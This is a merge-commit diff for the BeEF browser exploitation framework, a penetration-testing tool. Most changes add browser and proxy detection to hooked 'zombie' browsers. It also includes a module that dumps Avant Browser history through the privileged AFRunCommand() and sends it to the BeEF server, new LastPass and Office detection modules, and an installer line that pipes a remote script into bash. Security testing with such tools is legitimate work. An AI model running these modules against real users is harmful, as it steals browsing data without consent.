Merge pull request #924 from phihag/install-pipeline-instead-of-fifo

Use a pipe instead of a fifo during installation

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.5-alpha
+0.4.4.7-alpha

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.5-alpha'
+    version: '0.4.4.7-alpha'
     debug: false
 
     restrictions:

core/filters/browser.rb

@@ -22,7 +22,7 @@ module Filters
   def self.is_valid_browsertype?(str)
     return false if not is_non_empty_string?(str)
     return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 250
     return false if has_non_printable_char?(str)
     true
   end
@@ -123,9 +123,9 @@ module Filters
     return true if not is_non_empty_string?(str)
     return false if str.length > 1000
     if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
     else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
     end
   end
 

core/main/client/browser.js

@@ -19,6 +19,22 @@ beef.browser = {
         return navigator.userAgent;
     },
 
+    /**
+     * Returns true if Avant Browser.
+     * @example: beef.browser.isA()
+     */
+    isA:function () {
+        return window.navigator.userAgent.match(/Avant TriCore/) != null;
+    },
+
+    /**
+     * Returns true if Iceweasel.
+     * @example: beef.browser.isI()
+     */
+    isI:function () {
+        return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
+    },
+
     /**
      * Returns true if IE6.
      * @example: beef.browser.isIE6()
@@ -241,7 +257,31 @@ beef.browser = {
      * @example: beef.browser.isFF21()
      */
     isFF21:function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+    },
+
+    /**
+     * Returns true if FF22
+     * @example: beef.browser.isFF22()
+     */
+    isFF22:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
+    },
+
+    /**
+     * Returns true if FF23
+     * @example: beef.browser.isFF23()
+     */
+    isFF23:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
+    },
+
+    /**
+     * Returns true if FF24
+     * @example: beef.browser.isFF24()
+     */
+    isFF24:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
     },
 
     /**
@@ -249,7 +289,7 @@ beef.browser = {
      * @example: beef.browser.isFF()
      */
     isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24();
     },
 
     /**
@@ -404,6 +444,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 19.
+     * @example: beef.browser.isC19iOS()
+     */
+    isC19iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 20.
      * @example: beef.browser.isC20()
@@ -412,6 +460,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 20.
+     * @example: beef.browser.isC20iOS()
+     */
+    isC20iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 21.
      * @example: beef.browser.isC21()
@@ -420,6 +476,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 21.
+     * @example: beef.browser.isC21iOS()
+     */
+    isC21iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 22.
      * @example: beef.browser.isC22()
@@ -428,6 +492,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 22.
+     * @example: beef.browser.isC22iOS()
+     */
+    isC22iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 23.
      * @example: beef.browser.isC23()
@@ -436,6 +508,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 23.
+     * @example: beef.browser.isC23iOS()
+     */
+    isC23iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 24.
      * @example: beef.browser.isC24()
@@ -444,6 +524,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 24.
+     * @example: beef.browser.isC24iOS()
+     */
+    isC24iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 25.
      * @example: beef.browser.isC25()
@@ -452,6 +540,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 25.
+     * @example: beef.browser.isC25iOS()
+     */
+    isC25iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 26.
      * @example: beef.browser.isC26()
@@ -460,12 +556,52 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 26.
+     * @example: beef.browser.isC26iOS()
+     */
+    isC26iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 27.
+     * @example: beef.browser.isC27()
+     */
+    isC27:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 27.
+     * @example: beef.browser.isC27iOS()
+     */
+    isC27iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 28.
+     * @example: beef.browser.isC28()
+     */
+    isC28:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 28.
+     * @example: beef.browser.isC28iOS()
+     */
+    isC28iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS();
     },
 
     /**
@@ -540,13 +676,25 @@ beef.browser = {
             C17:this.isC17(), // Chrome 17
             C18:this.isC18(), // Chrome 18
             C19:this.isC19(), // Chrome 19
+            C19iOS:this.isC19iOS(), // Chrome 19 on iOS
             C20:this.isC20(), // Chrome 20
+            C20iOS:this.isC20iOS(), // Chrome 20 on iOS
             C21:this.isC21(), // Chrome 21
+            C21iOS:this.isC21iOS(), // Chrome 21 on iOS
             C22:this.isC22(), // Chrome 22
+            C22iOS:this.isC22iOS(), // Chrome 22 on iOS
             C23:this.isC23(), // Chrome 23
+            C23iOS:this.isC23iOS(), // Chrome 23 on iOS
             C24:this.isC24(), // Chrome 24
+            C24iOS:this.isC24iOS(), // Chrome 24 on iOS
             C25:this.isC25(), // Chrome 25
+            C25iOS:this.isC25iOS(), // Chrome 25 on iOS
             C26:this.isC26(), // Chrome 26
+            C26iOS:this.isC26iOS(), // Chrome 26 on iOS
+            C27:this.isC27(), // Chrome 27
+            C27iOS:this.isC27iOS(), // Chrome 27 on iOS
+            C28:this.isC28(), // Chrome 28
+            C28iOS:this.isC28iOS(), // Chrome 28 on iOS
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -571,6 +719,9 @@ beef.browser = {
             FF19:this.isFF19(), // Firefox 19
             FF20:this.isFF20(), // Firefox 20
             FF21:this.isFF21(), // Firefox 21
+            FF22:this.isFF22(), // Firefox 22
+            FF22:this.isFF23(), // Firefox 23
+            FF22:this.isFF24(), // Firefox 24
             FF:this.isFF(), // Firefox any version
 
             IE6:this.isIE6(), // Internet Explorer 6
@@ -662,34 +813,82 @@ beef.browser = {
             return '19'
         }
         ;	// Chrome 19
+        if (this.isC19iOS()) {
+            return '19'
+        }
+        ;   // Chrome 19 for iOS
         if (this.isC20()) {
             return '20'
         }
         ;	// Chrome 20
+        if (this.isC20iOS()) {
+            return '20'
+        }
+        ;   // Chrome 20 for iOS
         if (this.isC21()) {
             return '21'
         }
         ;	// Chrome 21
+        if (this.isC21iOS()) {
+            return '21'
+        }
+        ;   // Chrome 21 for iOS
         if (this.isC22()) {
             return '22'
         }
         ;    // Chrome 22
+        if (this.isC22iOS()) {
+            return '22'
+        }
+        ;   // Chrome 22 for iOS
         if (this.isC23()) {
             return '23'
         }
         ;    // Chrome 23
+        if (this.isC23iOS()) {
+            return '23'
+        }
+        ;   // Chrome 23 for iOS
         if (this.isC24()) {
             return '24'
         }
         ;    // Chrome 24
+        if (this.isC24iOS()) {
+            return '24'
+        }
+        ;   // Chrome 24 for iOS
         if (this.isC25()) {
             return '25'
         }
         ;    // Chrome 25
+        if (this.isC25iOS()) {
+            return '25'
+        }
+        ;   // Chrome 25 for iOS
         if (this.isC26()) {
             return '26'
         }
         ;    // Chrome 26
+        if (this.isC26iOS()) {
+            return '26'
+        }
+        ;   // Chrome 26 for iOS
+        if (this.isC27()) {
+            return '27'
+        }
+        ;    // Chrome 27
+        if (this.isC27iOS()) {
+            return '27'
+        }
+        ;   // Chrome 27 for iOS
+        if (this.isC28()) {
+            return '28'
+        }
+        ;    // Chrome 28
+        if (this.isC28iOS()) {
+            return '28'
+        }
+        ;   // Chrome 28 for iOS
         if (this.isFF2()) {
             return '2'
         }
@@ -778,6 +977,18 @@ beef.browser = {
             return '21'
         }
         ;    // Firefox 21
+        if (this.isFF22()) {
+            return '22'
+        }
+        ;   // Firefox 22
+        if (this.isFF23()) {
+            return '23'
+        }
+        ;   // Firefox 23
+        if (this.isFF24()) {
+            return '24'
+        }
+        ;   // Firefox 24
 
         if (this.isIE6()) {
             return '6'
@@ -887,7 +1098,7 @@ beef.browser = {
                 beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
             } catch (e) {
                 // warn on cross-domain
-                beef.debug("Hooking frame failed");
+                beef.debug("Hooking child frame failed: "+e.message);
             }
         }
     },
@@ -902,7 +1113,7 @@ beef.browser = {
         if (!this.type().IE) {
             return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
         } else {
-            flash_versions = 11;
+            flash_versions = 12;
             flash_installed = false;
 
             if (window.ActiveXObject) {
@@ -914,10 +1125,10 @@ beef.browser = {
                         }
                     }
                     catch (e) {
+                        beef.debug("Creating Flash ActiveX object failed: "+e.message);
                     }
                 }
             }
-            ;
             return flash_installed;
         }
     },
@@ -943,7 +1154,7 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+        // Internet Explorer
         } else {
 
             try {
@@ -951,6 +1162,7 @@ beef.browser = {
                 var qt_test = new ActiveXObject('QuickTime.QuickTime');
 
             } catch (e) {
+                beef.debug("Creating QuickTime ActiveX object failed: "+e.message);
             }
 
             if (qt_test) {
@@ -963,7 +1175,7 @@ beef.browser = {
 
     },
 
-	/**
+    /**
      * Checks if the zombie has the RealPlayer plugin installed.
      * @return: {Boolean} true or false.
      *
@@ -984,30 +1196,30 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+        // Internet Explorer
         } else {
 
-			var definedControls = [
-			    'RealPlayer',
-				'rmocx.RealPlayer G2 Control',
-			    'rmocx.RealPlayer G2 Control.1',
-			    'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
-			    'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
-				];
+            var definedControls = [
+              'RealPlayer',
+              'rmocx.RealPlayer G2 Control',
+              'rmocx.RealPlayer G2 Control.1',
+              'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
+              'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
+            ];
 
-			for (var i = 0; i < definedControls.length; i++) {
+            for (var i = 0; i < definedControls.length; i++) {
 
             	try {
-
-                	var rp_test = new ActiveXObject(definedControls[i]);
-
+                    var rp_test = new ActiveXObject(definedControls[i]);
             	} catch (e) {
+                    beef.debug("Creating RealPlayer ActiveX object failed: "+e.message);
             	}
 
-            	if ( rp_test ) {
-                	realplayer = true;
-            	}
-			}
+                if ( rp_test ) {
+                    realplayer = true;
+            	
+                }
+            }
         }
 
         return realplayer;
@@ -1043,6 +1255,7 @@ beef.browser = {
 	            var wmp_test = new ActiveXObject('WMPlayer.OCX');
 
 	        } catch (e) {
+                    beef.debug("Creating WMP ActiveX object failed: "+e.message);
 	        }
 
 	        if (wmp_test) {
@@ -1071,10 +1284,11 @@ beef.browser = {
             try {
                 control = new ActiveXObject("VideoLAN.VLCPlugin.2");
                 vlc = true ;
-                } catch(e) {
-                }
-        };
-        return vlc ;
+            } catch(e) {
+                    beef.debug("Creating VLC ActiveX object failed: "+e.message);
+            }
+        }
+        return vlc;
     },
 
     /**

core/main/constants/hardware.rb

@@ -34,8 +34,8 @@ module Constants
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
-	HW_GOOGLE_UA_STR      = 'Nexus One'
-	HE_GOOGLE_IM          = 'nexus.png'
+	HW_GOOGLE_UA_STR      = 'Nexus'
+	HW_GOOGLE_IMG         = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'

core/main/handlers/browserdetails.rb

@@ -68,6 +68,7 @@ module BeEF
                       }
           zombie.httpheaders = @http_headers.to_json
           zombie.save
+          #puts "HTTP Headers: #{zombie.httpheaders}"
 
           # add a log entry for the newly hooked browser
           BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
             self.err_msg "Invalid browser name returned from the hook browser's initial connection."
           end
 
+          # detect browser proxy
+          using_proxy = false
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'PROXY_CONNECTION',
+            'PROXY_AUTHENTICATE',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR',
+            'VIA'
+          ].each do |header|
+            unless JSON.parse(zombie.httpheaders)[header].nil?
+              using_proxy = true
+              break
+            end
+          end
+
+          # retrieve proxy client IP
+          proxy_clients = []
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR'
+          ].each do |header|
+            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
+          end
+
+          # retrieve proxy server
+          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+
+          # store and log proxy details
+          if using_proxy == true
+            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
+            proxy_log_string = "#{zombie.ip} is using a proxy"
+            unless proxy_clients.nil?
+              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
+              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
+            end
+            unless proxy_server.nil?
+              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
+              proxy_log_string += " [server: #{proxy_server}]"
+            end
+            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
+          end
+
           # get and store browser version
           browser_version = get_param(@data['results'], 'BrowserVersion')
           if BeEF::Filters.is_valid_browserversion?(browser_version)

core/main/models/browserdetails.rb

@@ -80,6 +80,7 @@ module Models
       
       return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
       return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
+      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
       return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
-      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
     
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end

extensions/admin_ui/media/javascript/ui/panel/DataGrid.js

@@ -45,7 +45,7 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'type',
 			sortable: true,
 			width: 60,
-			renderer: function(value, metaData, record, rowIndex, colIndex, store) {
+			renderer: function(value) {
 				return "<b>" + $jEncoder.encoder.encodeForHTML(value) + "</b>";
 			}
 		}, {
@@ -54,7 +54,9 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'event',
 			sortable:true,
 			width: 420,
-			renderer: $jEncoder.encoder.encodeForHTML(this.formatTitle)
+			renderer: function(value){
+                return $jEncoder.encoder.encodeForHTML(value);
+            }
 		}, {
 			id: 'log-date',
 			header: "Date",

install-beef

@@ -5,6 +5,8 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
+set -e
+
 clear
 echo "======================================"
 echo "          BeEF Installer   "
@@ -76,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
 
 sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
 
-bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
 
 echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
 

liveCD/BeEFLive.sh

@@ -189,6 +189,8 @@ show_menu() {
 			 git stash
 			 git pull
 			 msf="0"
+			 # check for new bundle requirements and update
+		     bundle update
 		fi
 		
 		#

modules/browser/avant_steal_history/command.js

@@ -15,37 +15,33 @@
 //
 beef.execute(function() {
 
-	
+	if (!beef.browser.isA()) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
+		return;
+	}
 
 	var avant_iframe = document.createElement("iframe");
 	//var avant_iframe = beef.dom.createInvisibleIframe();
-	avant_iframe.setAttribute('src', "browser:home");
-	avant_iframe.setAttribute('name','test2');
-	avant_iframe.setAttribute('width','0');
-	avant_iframe.setAttribute('heigth','0');
+	avant_iframe.setAttribute('src',      'browser:home');
+	avant_iframe.setAttribute('name',     'avant_history_<%= @command_id %>');
+	avant_iframe.setAttribute('width',    '0');
+	avant_iframe.setAttribute('heigth',   '0');
 	avant_iframe.setAttribute('scrolling','no');
+	avant_iframe.setAttribute('style',    'display:none');
 
 	document.body.appendChild(avant_iframe);
 
 	var vstr = {value: ""};
 
-	if(window['test2'].navigator) {
-	//This works if FF is the rendering engine
-	window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
-
+	if (window['avant_history_<%= @command_id %>'].navigator) {
+		//This works if FF is the rendering engine
+		window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
+	} else {
+		// this works if Chrome is the rendering engine
+		//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
 	}
-	else {
-	// this works if Chrome is the rendering engine
-	//window['test2'].AFRunCommand(60003, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");	
-
-	}
-	
-
-	
-
-	
 
 });
 

modules/browser/avant_steal_history/config.yaml

@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Browser"
             name: "Get Visited URLs (Avant Browser)"
-            description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+            description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
             authors: ["Roberto Suggi Liverani"]
             target:
-                working: ["ALL"]
+                working: ["FF"]

modules/browser/browser_fingerprinting/command.js

@@ -34,6 +34,10 @@ beef.execute(function() {
 		new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
 		new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
 		new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
+		new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
+		new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
+		new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
+		new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
 		new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
 		new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
 		new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")

modules/browser/detect_lastpass/command.js

@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var result = "Not in use or not installed";
+
+	var lpdiv = document.getElementById('hiddenlpsubmitdiv');
+	if (typeof(lpdiv) != 'undefined' && lpdiv != null) {
+		//We've got the first detection of LP
+		result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
+	} else if ($j("script:contains(lastpass_iter)").length > 0) {
+		//We've got the second detection of LP
+		result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
+	} else {
+
+		//Form is not there, lets check for any form elements in this page, because, LP won't activate at all without a <form>
+		if (document.getElementsByTagName("form").length == 0) {
+			//No forms
+			result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
+		}
+		
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass="+result);
+});
+

modules/browser/detect_lastpass/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_lastpass:
+            enable: true
+            category: "Browser"
+            name: "Detect LastPass"
+            description: "This module checks if the LastPass extension is installed and active."
+            authors: ["xntrik"]
+            target:
+                 not_working: ["IE"]
+                 working: ["All"]

modules/browser/detect_lastpass/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_lastpass < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
+		save content
+	end
+
+end

modules/browser/detect_office/command.js

@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+            var ma = 1;
+            var mb = 1;
+            var mc = 1;
+            var md = 1;
+            try {
+                ma = new ActiveXObject("SharePoint.OpenDocuments.4")
